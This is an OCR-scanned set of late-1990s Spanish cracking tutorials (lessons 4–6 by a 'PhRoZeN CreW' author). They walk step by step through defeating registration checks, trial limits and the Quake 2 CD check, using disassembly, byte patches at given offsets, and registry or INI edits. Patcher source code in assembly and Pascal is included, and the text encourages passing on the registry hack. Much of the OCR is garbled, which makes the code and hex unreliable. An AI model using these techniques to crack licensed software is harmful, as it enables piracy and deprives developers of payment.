- Paso 3.- Ok, sal del programa. 
- Paso 4.- Ejecuta WC, y ve al directorio de TrayCal. 


Paso 5.- Copia TRAYCAL.EXE a TRAYCAL.EXX (como backup) y copia TRAYCAL.EXE 
a TRAYCAL.W32 (para usar con W32Dasm) 


- Paso 6.- Ejecuta W32Dasm y desensambla TRAYCAL.W32. 


- Paso 7.- Una vez desensamblado, haz click en STRING DATA REFERENCE, busca la 
cadena “Sorry, invalid registration code...”. (Recuerda este mensaje de error) Haz doble click en 
el. 


- Paso 8.- Cierra la ventana SDR, deberías ver la línea: 
:0043FD30 7E1A jle 0043 FD4C 
:0043FD32 6A00 push 00000000 
:0043FD34 668B0DE4FF4300 mov cx, word ptr [0043FFE4] 


:0043FD3B 33D2 xor edx, edx 


* Possible StringData Ref from Code Obj ->"Sorry, invalid registration code." 


Mira a la dirección 0043FD30, es a donde saltará cuando introduces un código erróneo. Let's try. 
Asegurate de que la berra verde esta en 0043FD30 7E1A ¡le 0043FD4C, y verás la dirección de 
compensación bajo la pantalla, (Offset 0003F130h). Es donde puedes hacer el parche para 
TRAYCAL.EXE 


- Paso 9.- Vuelve a WC, ejecuta HIEW TRAYCAL.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS y pon 3F130, con lo que deberías ver algo como: 


.0003FD30: 7E1A jle .00003FD4C  ---------- (1) 
.0003FD32: 6A00 push 000 
.0003FD34: 668B0DE4FF4300 mov  Cx,[00043FFE4] 


.0003FD3B: 33D2 xor  edx,edx 


- Paso 10.- Aquí es donde puedes cambiar los bits, pulsa F3, pon EB, pulsa F9 para guardar los 
cambios y sal de HIEW. 


- Paso 11.- Ejecuta TRAYCAL.EXE, funciona? Nah, compra la mierda en el registro! 
- Paso 12.- Vuelve a W32Dasm, pulsa otra vez en “Sorry, invalid registration...” 
- Paso 13.- Cierra la ventana SDR, deberías ver la línea: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


:0043FE34(C) 


:0043FF1B 6A00 push 00000000 


:0043FF1D 668B0DE4FF4300 mov cx, word ptr [0043FFE4] 


:0043FF24 33D2 xor edx, edx 
* Possible StringData Ref from Code Obj ->"Sorry, invalid registration code." 
Ven arriba que viene de un salto en las direccion? : 0043FE34(C) 


Presionen la tecla PgUp 2 o 3 veces u verán: 


:0043FE34 0F35E1000000 jne 0043FF1B 


* Possible StringData Ref from Code Obj ->"SoftwarelSpaeder" 


:0043FE3A 8B0DDC194400 mov ecx, dword ptr [004419DC] 


- Paso 14.- Mira a la dirección 0043FE34, sabemos que esto compara otra vez despues de 
introducir un nuevo código. Now let's try. Asegurate de que la barra verde esta en 0043FE34 
0F85E1000000 jne 0043FF1B y verás la dirección de compensación bajo la pantalla, (Ooffset 
0003F234h). Es donde puedes hacer el parche para TRAYCAL.EXE. 


- Paso 15.- Vuele a WC, ejecuta HIEW TRAYCAL.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS y pon 3F234. Deberías ver algo como: 


.0003FE34: 0F85E 1000000 jne .00003FF1B  ---------- (1) 
.0003FE3A: 8B0DDC194400 mov  ecx,[0004419DC] 
.0003FE40: B201 mov  dl,001 


.0003FE42: A128D84300 mov  eax,[00043D828] 


- Paso 16.- Aquí es donde puedes cambiar los bits, pulsa F3, pon 0F84, pulsa F9 para guardar 
los cambios y sal de HIEW. 


- Paso 17.- Ejecuta TRAYCAL.EXE, funciona? Kewl, lo has registrado!! 


Parte 4: Por que copio ficheros *.EXE a *.W32? 


Sé que algunas personas estan preguntando porque copio ficheros *.EXE a *.W32. Fácil.. Si usas 
* EXX algunas veces el programa no funciona, luego no puedo copiar de *.EXX a *.EXE. 
Cuando uso *.W32 puedo hacer el parche en ficheros *.EXE cuando todavía estan siendo usados 
por W32Dasm, por consiguiente usa ahora los ficheros *.W32... Ahora dime como puedo hacer 
el engaño! ] Recuerda guardar los ficheros desensamblados antes de salir de W32Dasm, la 
próxima vez no tendras que desensamblarlo. 


Parte 5: Código fuente ASM para un parche, por Nop/PC “97 


; Patcher by Nop [Pc] - SourceCode 100% free 


; To use with A86: 


] A86 CrkNop.asm 


; To use with TASM: 


, tasm CrkNop.asm 


: tlink /t CrkNop.obj 


; Greetz to all members of the Scene 


.MODEL TINY 


.CODE 


.286 


ORG 100h 


start: 


mov  ah,9 ; pb Show Title p 


mov dx, offset MainTitle 


int 


int 


jnb 


int 


int 


21h 


mov 


mov 


21h 


Ok 


mov 


mov 


216 


mov 


21h 


mov 


mov 


mov 


mov 


ax, 3D02h ; b Open File p 


dx, offset filename 


ah, 9 ; pb File Not Found pb 


dx, offset error 


ax, 4C01h ; p Exit with error pb 
bx, ax ; pb Move pointer p 

ax, 4200h 

cx, 0 ; segment 

dx, 565 ; Offset 


int 21h 


mov ax, 4000h ; p Write values b 


mov cx, 1l ; number of bytes to write 


mov dx, offset BytesToWrite 


int 21h 

mov ax, 3E00h ; pb Close file p 
int 21h 

mov  ah,9 ; b Show msg b 


mov dx, offset done 


int 21h 
mov ax, 4C00h ; p All Done And Exit pb 
int 21h 


MainTitle  dbODh,0Ah 


error 


filename 


db ' ÚBBBRBRBEBBBOO  UUÚRBR8888BOÚ ÚBBBBBBEBBOU' ODh,O0Ah 
db'Ú Ú Ú ÚUÚ UÚ'0Dh,0Ah 


A 


ÚU Ú UÚ'0Dh,0Ah 


5 
a 
o 
o 
o 
o 


EN 


do'Ú Ú Ú Ú Ú ÚUÚ UUÚ'0Dh,0Ah 


S 
E 
E 
E 
E 
a» 
a» 
a» 
a» 


88888 '¡ODh,0Ah 
dbsti 0 -U «0 ÚÚ 6Ú proudly',ODh,0Ah 
db ' ÚUVUUOUDVUVÚ BÚUVUUUVUUVOÚS ÚUVUOÚ presents',ODh,0Ah 


db ' VUVUUOUUUUUUUUUUC UL OLCUUCULUVUUUUVUOOOS* ODh,0Ah 


db 'Ú8 BÚ'ODh,0Ah 
db 'Ú PROG NAME Ú' ODh,0Ah 
db 'Ú REMOVE CD-CHECK Ú',ODh,0Ah 
db 'Ú BY NOP Ú',0Dh,0Ah 
db 'ÚU UÚ'ODh,0Ah 


db ' BREBEBB BERE BE BEBER RE BREA BEREBER REBREREREEBEE6 ',ODh,OAh 


db ODh,0Ah,$' 


db ' p ERROR: Hm... problem with file ? '¡ODh,0Ah,'$' 


db 'FILE.EXE',0 


done db'p Enjoy ! , ODh,0Ah,'$' 


BytesToWrite db OEBh 


end start 


Ok, suficiente por ahora. Espero que te hayas divertido con este tutorial más de lo que yo lo 
hice!J 


Te veré la próxima vez en el Tutorial 45! 


Gracias a Taha, Taylor, ThatDude, Archimede, PowerLord y a todo el mundo en el PC!! 


Este tutorial esta dedicado a Taha... sin ella no podría ir a mucho más en el futuro, y si no fuera 
por ella, yo no podría volver a P.C. nunca. Así que estaré en P.C., larga vida para PhRoZeN 
CreW!! Thanx babe J 


Puedes encontrarme en *pc98 o mandame un email a tkcO goplay.com(escribe en inglés) 


Que te diviertas! 


The keyboard Caper, 


El fundador de PhRoZeN CreW “94 - “98 


25-12-1997 


tKKC CRACKING TUTOR, LECCIÓN 5. 


Hi ya! 


Phew, aquí estamos otra vez aprendiendo a crackear a tus bebes! Demasiadas abejas!! Cought 
Ok, let's rock, en este tutorial te enseñare como jugar con tu registro WIN y como matar pausas. 
J 


Todavía nada sobre Softlce, todavía estoy con mi pequeño portátil, pero tendré una nueva 
máquina pronto, ya cantaremos entonces! ] 


Discúlpame por mis errores grámaticales, espero que entiendas este pedazo! ] 

Ok, let's rave! 

Herramientas: 

Necesitaras lo siguiente: (Yo usé estas herramientas, y doy por hecho que tú también las usarás): 
- W32Dasm 8.9 o supeior (www.expage.com/page/w32dasm) 


- Hacker's View 5.66 (E-mail: sen Osuslikov.kemerovo.su) 


- FAR 1.50b (ftp://ftp.elf.stuba.sk/pub/pc/utilfile/far150b.exe) Es realmente bueno! O Windows 
Commander 3.50 Beta 5 (http://www.ghisler.com) 


Contenidos: 


1) Como registrar TrayCal 1.0 usando el registro WIN. Url: http://www.spaeder.com 


2) Como registrar CopyPaste 1.20 Url: http//www.wz.com/scriptsoftware 


3) Como eliminar las pausas en Radio Destiny 0.2 Url: http://www.destiny- 
software.com/destiny 


4) Código fuente Pascal para Parches, por tKC/PC “98 


Parte 1: Registrar TrayCal 1.0 usando el registro WIN. 
- Paso 1.- Ejecuta TRAYCAL.EXE 


- Paso 2.- Veras el mensaje que dice que puedes ejecutar el programa 15 veces, para evaluarlo. 
Haz click en registrar y pon tu nombre y cualquier código. Boom Código de registro inválido. 


- Paso 3.- Sal del programa. 
- Paso 4.- Ejecuta WC, y ve al directorio de TRAYCAL. 
- Paso 5.- Copia TRAYCAL.EXE a TRAYCAL.W32 


- Paso 7.- Desensamblalo y haz click en STRING DATA REFERENCE, y busca la cadena 
“Sorry, invalid registration code.”. Recuerda el mensaje y haz doble click en el. 


- Paso 8.- Cierra la ventana SDR, y deberías ver la línea: 


* Possible StringData Ref from Code Obj ->"Sorry, invalid registration code." 


:0043FD3D A1E8194400 mov eax, dword ptr [004419E8] 


:0043FD42 E88DO2FFFF call 0042 FFD4 


- Paso 9.- Ok, busquemos que pasa si has introducido un código inválido. Pulsa AvPág 2 o 3 
veces hasta ver: 


* Possible StringData Ref from Code Obj ->"SoftwarelSpaeder" 


:0043FE3A 8B0DDC 194400 mov ecx, dword ptr [004419DC] 


:0043FE40 B201 mov dl, 01 

:0043FE42 A128D84300 mov eax, dword ptr [0043D828] 
:0043FE47 E8S80E1FFFF call 0043DFCC 

:0043FE4C A3FC274400 mov dword ptr [004427FC], eax 


:0043FE51 C605C819440001 mov byte ptr [004419C8], 01 


:0043FE58 A0C8194400 mov al, byte ptr [004419C8] 


:0043FES5D 50 push eax 


* Possible StringData Ref from Code Obj ->"EnhancedSystemDate" 


:0043FESE B920004400 mov ecx, 00440020 


* Possible StringData Ref from Code Obj ->"TrayCal" 


:0043FE63 8B15D8194400 mov edx, dword ptr [004419D8] 


:0043FE69 A1FC274400 mov eax, dword ptr [004427FC] 
:0043FE6E ESADESFFEF call 0043E420 
:0043FE73 6AO01 push 00000001 


* Possible StringData Ref from Code Obj ->"RegistrationStatus”" 


- Paso 10.- Interesante... ves “RegistrationStatus”? Let's run (Ejecuta) REGEDIT y hecha un 
vistazo a HKCU Software WSpaedenTrayCal: 


EnhancedSystemDate="0" 
RegistrationStatus="0" 
Qué quiere decir? Deberías saberlo! ] Ok, let“s modify them. Cambia “0” por “1” 


Nota: Debemos cambiar EnhancedSystemDate Key también, sino no funcionaría. Bien, pulsa FS 
para guardar los cambios. 


- Paso 11.- Ejecuta TRAYCAL.EXE. Haz click en TC con el botón derecho, y en ABOUT. 
Wow, esta regulándose ahora!! Fácil eh? 


- Paso 12.- Dde todas formas puedes exportar HKKCUWSoftwarelSpaederTrayCal a un fichero. 
Haz click en Export Registry File, guardala como TC.REG... Mira abajo: 


REGEDIT4 
[HKEY_CURRENT_USER Software paedenTrayCal] 


"RegistrationStatus"="1" 


n_n3qnm 


"EnhancedSystemDate"= 


- Paso 13.- Puedes pasar TC.REG a cualquiera o la próxima vez ejecutar REGEDIT TC.REG, 
lo que lo importará al fichero de registro.. 


Parte 2: Registrar CopyPaste 1.20 

- Paso 1.- Ejecuta CopyPaste.EXE. 

- Paso 2.- Pon cualquier password para registrarlo. Boom Password erróneo — no registrado. 
- Paso 3.- Bien. Sal del programa. 

- Paso 4.- Ejecuta WC, y ve al directorio de CopyPaste. 


- Paso 5.- Copia CopyPaste.EXE a CopyPaste.EXX (como backup) y copia CopyPaste.EXE a 
CopyPaste.W32 (para usar con W32Dasm). 


- Paso 6.- Ejecuta W32Dasm y dessensambla CopyPaste.W32. 


- Paso 7.- Una vez desensamblado, haz click en STRING DATA REFERENCE, y busca la 
cadena “Wrong password — no register...”. 


- Paso 8.- Cierra la ventana SDR, y deberías ver las líneas: 
* Referenced by a (U)jnconditional or (C)onditional Jump at Addresses: 


1:00403427(C), :00403438(C) 


:0040346F 8D442430 lea eax, dword ptr [esp+30] 


:00403473 68FF000000 push 000000éFF 


:00403478 50 push eax 


:00403479 8B0D1C664100 mov ecx, dword ptr [0041661C] 


* Possible Reference to String Resource ID=00014: "Wrong password - no reg.." 


- Paso 9.- Has visto los saltos a los que se hace refencia? (403427 y 403438) Bien, pulsa RePág 
hasta ver: 


- Paso 10.- Mira 00403427, es a donde se saltará cuando ha sido jodido. Let's see. Asegurate de 
que la barra verde esta en 00403427 7446 je 0040346F y verás la dirección de compensación bajo 
la pantalla, (E Offset 0O002827h). Es donde puedes hacer el parche para CopyPaste.EXE. 


- Paso 11.- Vuelve a WC, ejecuta HIEW COPYPA-1.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS y pon 2827. Deberías ver algo como: 


00002827: 7446 je  00000286F ---------- (1) 
00002829: 8D442410 lea eax,[esp][00010] 
0000282D: 50 push eax 

0000282E: E81D400000 call 000006850 ---------- Q) 
00002833: 83C404 add  esp,004 

00002836: 85C0 test eax,eax 

00002838: 7435 je  00000286F ---------- (6) 


- Paso 12.- Aquí es donde puedes cambiar los bits, pulsa F3, pon 9090 y ve abajo hasta 7435 
(offset 2838), pon 9090, pulsa F9 para guardar los cambios y sal de HIEW. 


- Paso 13.- Ejecuta CopyPaster.EXE, funciona? Eeyaa lo has hecho!! 


Parte 3: Eliminar pausas en Radio Destiny 0.2 
- Paso 1.- Ejecuta RADIO.EXE 

- Paso 2.- Boom esta versión ha caducado. Sal del programa. 
- Paso 3.- Ejecuta WC, ve al directorio de RADIO. 


- Paso 4.- Copia RADIO.EXE a RADIO.EXX (como backup) y copia RADIO.EXE a 
RADIO.W32 (para usar con W32Dasm) 


- Paso 5.- Ejecuta W32Dasm y desensambla RADIO.W32. 


- Paso 6.- Una vez desensamblado haz click en STRING DATA REFERENCE, y busca la 
cadena “This version has expired.”. 


- Paso 7.- No salgas de W32Dasm. Ejecuta HIEW RADIO.EXE. Pulsa F4 para el modo HEX, 
y pulsa F7. Busca la cadena “This version has exp” Gotcha! Lo encuentra! Ahora que? Ok, 
localiza el offset 6A26 (mira sobre HIEW) 


- Paso 8.- Vuelve a W32Dasm, pulsa AvPág hasta ver la dirección de compensación 
“00006A26h” (mira abajo en W32Dasm) 


- Paso 9.- Wow, que tenemos? Tenemos esto: 
:0001.63A6 54686973207665727369 DB "This versi" 
:0001.63B0 6F6E2068617320657870 DB "on has exp" 
:0001.63BA 697265642E00 DB "ired.",0 


Pulsa RePág 3 o 4 veces. Cuando ves "BYTE xxxxh" ignoralo, luego, los saltos referenciados no 
funcionarán! 


- Paso 10.- Hmm, que ves? Call USER MESSAGEBOX!! 


:0001.630A 9AC75B0000 call USER.IMESSAGEBOX 


Así que sabemos que llama a la caja de mensaje cuando ha caducado. 


Pulsa RePág hasta ver: 


:0001.62F1 7C21 316314 
:0001.62F3 7F05 jg 62FA 
:0001.62F5 3DB40B cmp ax, OBB4 
:0001.62F8 761A jbe 6314 


- Paso 11.- Mira a 0001.62Fl, es a donde se saltará cuando ha sido jodido. Let's see. Asegurate 
de que la barra verde esta en la dirección 0001.62F1 y verás la dirección de compensación bajo la 
pantalla, (O Offset 00006971h). Es donde puedes hacer el parche de RADIO.EXE. 


- Paso 12.- Vuelve a WC, ejecuta HIEW RADIO.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS y pon 6971. Deberías ver algo como: 


00006971: 7C21 jl. 000006994 

00006973: 7FOS jg  00000697A 
00006975: 3DB40B cmp  ax,00BB4 
00006978: 761A jbe 000006994 


- Paso 13.- Aquí es donde puedes cambiar los bits, pulsa F3, pon EB, pulsa F9 para guardar los 
cambios y sal de HIEW. 


- Paso 14.- Ok, ejecuta RADIO.EXE boom Funciona! J 


Parte 4: Código fuente Pascal para parches, por tKC/PC “98 


Uses Crt; 
Const A: Array[1..4] of Record (<-------- 4 bytes to be patched]) 

A : Longint; 

B : Byte; 

End = 
((A:$2827;B:$90), [ <--========="- offset "2827" and byte "90" to be changed) 
(A:$2828;B:$90), [ <----==-=-======-- offset "2828" and byte "90" to be changed) 
(A:$2838;B:$90), [ <----==-===-==--- offset "2838" and byte "90" to be changed) 
(A:$2839;B:$90)); [ <-=-=-===-======-- offset "2839" and byte "90" to be changed) 


Var Ch:Char; 


I:Byte; 
F:File; 


FN:file of byte; 


Size:longint; 


Begin 
Writeln(Little Patch”); writeln(Crack for CopyPaste 1.20 by tKC/PC "98”); 
Assign(F,COPYPA-1.EXE"); [<= ------- filename to be patched) 
[SI-) Reset(F, 1); (SI+-) 
If TOResult <> O then 
begin 
writeln('File not found!”); 
halt(); 
end; 
For l:=1 to 4 do [<= -=------- 4 bytes to be patched]) 
Begin 


Seek(F,A[I].A); 


Ch:=Char(A[IT].B); 
Blockwrite(F,Ch, 1); 
End; 


Writeln('File successfully patched!'); 


End. 


Ok, suficiente por hoy. Espero que te hayas divertido con este tutorial más de lo que yo lo hice! J 


Te vere la próxima vez en el tutorial +6! 


Agradecimientos a Taha, Taylor, ThatDude, Archimede, PowerLord y todo el mundo en P.C.!! 


Este tutorial esta dedicado a Taha... como siempre... 


Puedes encontrarme en *pc98 o mandame un email a tkc O goplay.com(escribe en inglés) 


Que te diviertas!! 


The Keyboard Caper 


El fundador de PhRoZeN CreW “94 - “98 


4-1-1998 


tKKC CRACKING TUTOR, LECCIÓN 6 


Hi ya! 
Phew, mucho sin tutorial! 
Más abejas cough.. 


En este tutorial te enseñaré todo sobre W32Dasm. Discúlpame, nada sobre Softlce o IDA 
todavía, devido al corto tiempo (damn coding en Delphi 3). Pero tengo una nueva máquina 
superPC!! 


En el próximo tutorial rabiaremos sobre Softlce. J 
Discúlpame por mis errores grámaticales, espero que entiendas este pedazo! ] 
Contenido: 
1) Como registrar DocSweep 3.0 
Usando el registro WIN sin parchear el programa. 


URL: http://www.spaeder.com 


2) Como registrar Cover Your Tracks 2.0 


Usando el fichero INI sin parchear el programa. 


URL: http://www.geocities.com/SiliconValley/Vista/5610/ 


3) Como crackear la comprobación de CD en Quake 2 3.10 


Parchear tu juego para que puedas jugar sin tu CD. 


URL: http://www.idsoftware.com 


4) Como registrar TrayRun 2.0.2 


Parchear un programa para aceptar tu regcode pero seguir desregistrado despues de reiniciar 
tu programa y como componerlo. La mayor parte de los programas shareware usan este 
esquema de registro. 


URL: http://www.mjnet.com 


S) Código fuente Pascal para parchear, por tKKC/PC “98 


Necesitaras Turbo Pascal 7.0 para compilar esta fuente. 


6) Mis últimas palabras. 


Herramientas: 


Necesitaras lo siguiente: (Yo usé estas herramientas, y doy por hecho que tú también las usarás): 


W32Dasm 8.9: http://www .fortunecity.com/bally/waterford/18/w32dasm89.zip 


Hacker”s View 5.66: ftp://ftp.cdrom.com/.27/sac/utilprog/hiewS66.zip 


Far 1.50b: ftp://rwntug.quarta.msk.ru/WinUtil/Rar/Far150b.exe 
Windows Commander 3.50 Beta 7: http://www.ghisler.com 
O pregunta a cualquier cracker por estas herramientas, ellos estarán contentos por servirte! 


A próposito: Puedes encontrar otras herramientas como Softlce 3.22, IDA 3.70 y otros programas 
en: http://cracking.home.ml.org 


No me digas que no tienes estas herramientas para el próximo tutorial! J 
Parte 1: Como registrar DocSweep 3.0 


- Paso 1.- Ejecuta DOCSWEEP.EXE 


- Paso 2.- Verás el mensaje que te dice que te quedan 30 días para probar el programa. Haz clic 
con el botón derecho en DS, y haz click en REG NUMBER. Pon tu nombre y cualquier código. 
Boom. Código inválido. 


- Paso 3.- Ok, Sal del programa. 

- Paso 4.- Ejecuta WC, y ve al directorio de DocSweep. 

- Paso 5.- Copia DOCSWEEP.EXE a DOCSWEEP.W32 

- Paso 6.- Ejecuta W32Dasm y desensambla DOCSWEEP.W32 


- Paso 7.- Una vez desensamblado, haz clic en STRING DATA REFERENCE, y escribe: 
“Invalid registration code”. (Recuerda aquel mensaje de error), y haz doble click en el. 


- Paso 8.- Cierra la ventana SDR, deberías ver la línea: 


* Possible StringData Ref from Code Obj ->"Invalid registration code.” <---- bad boy 


:0043578D A138784300 mov eax, dword ptr [00437838] 


:00435792 E89952FFFF call 0042 AA30 


- Paso 9.- Ok, vamos a ver que ocurre cuando introduces un código incorrecto. Pulsa RePág 
una o dos veces, hasta ver: 


:004356E1 0F859B000000 jne 00435782 <---- if invalid code, goto bad boy 


* Possible StringData Ref from Code Obj ->"SoftwarelSpaeder" 


:004356E7 8B0D34784300 mov ecx, dword ptr [00437834] 


:004356ED B201 mov dl, 01 

:004356EF B86C394300 mov eax, 0043396C 
:004356F4 ESCFESFFFF call 00433FC8 

:004356F9 A398864300 mov dword ptr [00438698], eax 


:004356FE C6059C86430001 mov byte ptr [0043869C], 01 <---- good boy 
:00435705 A09C864300 mov al, byte ptr [0043869C] 


:0043570A 50 push eax 


* Possible StringData Ref from Code Obj ->"Enhanced Hard Drive" 


- Paso 10.- Interesante... has visto lo que yo veo?? Ejecuta REGEDIT y hecha un vistazo a 
HKCUWSoftwarelSpaederilDocSweep: 


SectorsPerPartition="178" <---- Ejecuciones de evaluación restantes. 


Hmm, ok, vamos a añadir una nueva cadena llave. Debería ser algo como: 


Enhanced Hard Drive="1" 


SectorsPerPartition="178" 


- Paso 11.- Ejecuta DocSweep.exe, haz click con el botón derecho en DS, y haz click en About. 
Wow, esta registrado ahora!! Fácil eh? 


- Paso 12.- Hay otra forma de registrar DocSweep. Ahora quieres introducir cualquier código, 
no? Cambia “1” por “0” en Enhanced Hard Drive Key, y cambia JNE por JE en la dirección 
4356El1. Ejecuta DS pon tu nombre y cualquier código. Boom registrado! 


Parte 2: Como registrar Cover Your Tracks 2.0 
- Paso 1.- Ejecuta CYT.EXE 


- Paso 2.- Ahora ves el NAG que dice que te registres. Haz click en Register y pon tu nombre y 
cualquier código. 


- Paso 3.- Ok, sal del programa. 

- Paso 4.- Ejecuta WC, y ve al directorio de CY'T. 

- Paso 5.- Copia CYT.EXE a CYT.W32 

- Paso 6.- Ejecuta W32Dasm y desensambla CY T.W32. 


- Paso 7.- Una vez desensamblado, haz click en STRING DATA REFERENCE, y escribe: 
“Invalid code”. Himm, no hay cadenas, ahora que? Ok, intentemos buscar la cadena “Registered” 


Haz doble click en el. 


Paso 8.- Cierra la ventana SDR, y deberías ver la línea: 
* Possible StringData Ref from Code Obj ->"Registered” <---- good boy 
:0043E7A1 BA6CE84300 mov edx, 0043E86C 
:0043E7A6 E841E6FDFF call 0041 CDEC 
Paso 9.- Ok, vamos a buscar que hace. Pulsa RePág una o dos veces hasta ver: 
* Possible StringData Ref from Code Obj ->"C:1windowsIsystemisystem.cyt" 


:0043E743 BA34E84300 mov edx, 0043E834 


:0043E748 8B08 mov ecx, dword ptr [eax] 


* Possible StringData Ref from Code Obj ->"true" <---- good boy 


:0043E769 BA5CE84300 mov edx, 0043E85C 
:0043E76E E85153FCFF call 00403AC4 
:0043E773 7418 


je 0043E78D <---- if not goto bad boy 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:0043E773(C) 


:0043E78D C605EC27440001 mov byte ptr [004427EC], 01 


:0043E794 A1001C4400 mov eax, dword ptr [00441C00] 
:0043E799 8B00 mov eax, dword ptr [eax] 
:0043E79B 8B8020020000 mov eax, dword ptr [eax+00000220] 


* Possible StringData Ref from Code Obj ->"Registered” <---- good boy 


- Paso 10.- Interesante... ves lo que yo veo?? Que es eso de “CXAWindowsIsystemisystem.cyt”? 
Busca este fichero, y encontramos: 


false 


- Paso 11.- Hmm, vamos a probar a cambiar “false” por “true”. Graba los cambios y ejecuta 
CYT.EXE. Wow, esta registrado!! Es una de las protecciones más estupidas que he visto. 


Parte 3: Como crackear la comprobación de CD en Quake 2 3.10 


- Paso 1.- Ejecuta QUAKE2.EXE. 


- Paso 2.- Veras el mensaje que te dice que insertes tu CD para jugar. Ok, no problem, apunta 
el mensaje de error. (“You must have the Quake2 CD in the drive to play”) 


- Paso 3.- Ok, sal del programa. 

- Paso 4.- Ejecuta Windows Commander, ve al directorio de Quake2. 

- Paso 5.- Copia QUAKE2.EXE a QUAKE2.EXX, y copia QUAKE2.EXE a QUAKE2.W32. 
- Paso 6.- Ejecuta W32Dasm y desensambla QUAKE2.W32. 


- Paso 7.- Una vez desensamblado, haz click en STRING DATA REFERENCE, y escribe: 
“Y ou must have the Quake2 CD in...” (Recuerda este mensaje) y haz doble click en el. 


- Paso 8.. Cierra la ventana SDR, y deberías ver la línea: 


* Referenced by a CALL at Address: 00429038 <---- qué es eso? 


:0042D4F0 E83BFFFFFF call 0042D430 
:0042D4F5 803800 cmp byte ptr [eax], 00 
:0042D4F8 750F jne 0042D509 <---- bad boy 


* Possible StringData Ref from Data Obj ->"You must have the Quake2 CD in " 
->"the drive to play." 


- Paso 9.- Ok, vamos a buscar que llamada se produce. Hmm, ves lo que yo veo? Mira arriba, a 
la referencia por una llamada en 429038. Haz click en el botón Goto Code Location, y pon 
429038. 


- Paso 10.- Interesante... que hemos conseguido? Aquí esta lo que tenemos: 


:00429034 85C0 test eax, eax 


:00429036 7505 jne 0042903D <---- 1f not, jump to good boy 


:00429038 E8B 3440000 call 0042D4F0 <---- bad boy! 


* Referenced by a (U)jnconditional or (C)onditional Jump at Addresses: 


[:00428FE5(U), :00428FFS(C), :00429019(U), :00429036(C) 


:0042903D E84E710000 call 00430190 <---- good boy! 


- Paso 11.- Ok, vamos a cambiar 75 por EB en la dirección 429036. Asegurate de que la barra 
verde esta en 00429036 7505 ¡ne 0042903D y deberías ver la dirección debajo de la pantalla, 
algo como Offset 00028436h. Es donde puedes hacer el parche para QUAKE2.EXE. 


- Paso 12.- Vuelve a WC, ejecuta HIEW QUAKE2.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS y pon 28436. Deberías ver algo como: 


00028436: 7505 jne 00002843D —---------- (1) 
00028438: ESB3440000 call 00002C8F0 ---------- (2) 
0002843D: Es4E710000 call 00002F590 ---------- (3) 
00028442: 8B0DEC0F4700 mov  ecx,[000470FEC] 
00028448: A388104700 mov  [000471088],eax 


- Paso 13.- Aquí es donde puedes cambiar los bits, pulsa F3, pon EB, pulsa F9 para grabar los 
cambios y sal de HIEW. 


- Paso 14.- Ejecuta QUAKE2.EXE, funciona? Eeyaaa Lo has hecho!! 


Parte 4: Como registrar TrayRun 2.0.1 
- Paso 1.- Ejecuta TRAYRUN.EXE. 


- Paso 2..- Haz click en Register, pon tu nombre y cualquier código y... boom Registración 
inválida. 


- Paso 3.- Ok, sal del programa. 
- Paso 4.- Ejecuta WC, y ve al directorio de TRAYRUN. 


- Paso 5.- Copia TRAYRUN.EXE a TRAYRUN.EXX, y copia TRAYRUN.EXE a 
TRAYRUN.W32. 


- Paso 6.- Ejecuta W32Dasm y desensambla TRAYRUN.W32. 


- Paso 7.- Una vez desensamblado, haz click en STRING DATA REFERENCE, y escribe: 
“Registration failed”. (Recuerda el mensaje) y haz doble click en el. 


- Paso 8.- Cierra la ventana SDR, y deberías ver las líneas: 


* Possible StringData Ref from Code Obj ->"RegC" <---- and this? 


:0042E6C0 BAACE74200 mov edx, 0042E7AC 


:0042E6C5 8BC6 mov eax, esl 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:0042E64C(C) 


* Possible StringData Ref from Code Obj ->"Registration Failed.” <---- bad boy 


:0042E6F6 B8BCE74200 mov eax, 0042E7BC 


- Paso 9.- Ves lo que yo veo? Referenced jump! Ok, vamos a hacer click en Goto Code 
Location y pon 42E652C y encontrarás: 


:0042E64C 0F85A4000000 jne 0042E6F6 <---- if not, jump to bad boy 


* Possible StringData Ref from Code Obj ->"Registration Succesful.” <---- good 
boy 


:0042E652 B848E74200 mov eax, 0042E748 


- Paso 10.- Kew!l... Let's play! Asegurate de que la barra verde esta en 0042E64C 
0F85A400000 y verás la dirección de compensación bajo la pantalla, (Offset 0O02DA4Ch). Es 
donde puedes hacer el parche para TRAYRUN.EXE. 


- Paso 11..- Vuelve a WC, ejecuta HIEW TRAYRUN.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS, pon 2DA4C y deberías ver lo siguiente: 


0002DA4C: 0F85A4000000 jne 00002DAF6 ---------- (2) 
0002DA52: B348E74200 mov  eax,00042E748 
0002DA57: ES7CBBFFFF call 0000295D8  ---------- (3) 


0002DA3C: B201 mov  dl,001 


0002DAS5E: B870304200 mov  eax,000423070 
0002DA63: ESBC4AFFFF call 000022524 =--------- (4) 


- Paso 12.- Aquí es donde puedes cambiar los bits, pulsa F3, pon 0F84, pulsa F9 para grabar los 
cambios, y sal de HIEW. 


- Paso 13.- Ejecuta TRAYRUN.EXE. Pon tu nombre y cualquier código, ahora dice que esta 
registrado, no? Haz click en About y veras tu nombre, kew!l... 


- Paso 14.- Ahora sal de TrayRun ejecutalo otra vez. Hmm, todavía no esta registrado? Ahora 
que? NO necesitas mearte los calzoncillos! El programa comprueba tu nombre en el registro WIN 
si es válido! Ellos estan almacenados en HKCYSoftwarelKJTNET TrayRun Settings. 


- Paso 15.- Vuelve a W32Dasm y abre la ventana SDR, y escribe “RegC”. (Recuerdas donde 
has estado antes?) Lo has visto en la dirección 42E6C0 antes de que arreglaramos la 1* parte. 
Ahora haz doble click en “RegC”. 


- Paso 16.- Cierra la ventana SDR, deberías ver las líneas: 


* Possible StringData Ref from Code Obj ->"RegC" 


:004309EC BA9C0B4300 mov edx, 00430B9C 


:004309F1 8BC3 mov eax, ebx 


:00430A0C 833DD426430000 cmp dword ptr [004326D4], 00000000 <---- 
regcode! 


:00430A 13 750D jne 00430422 


:00430A 15 833DD826430000 cmp dword ptr [004326D3], 00000000 


:00430A1C 0F84E0000000 je 00430B02 <---- if not, jump to bad boy 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:00430A13(C) 


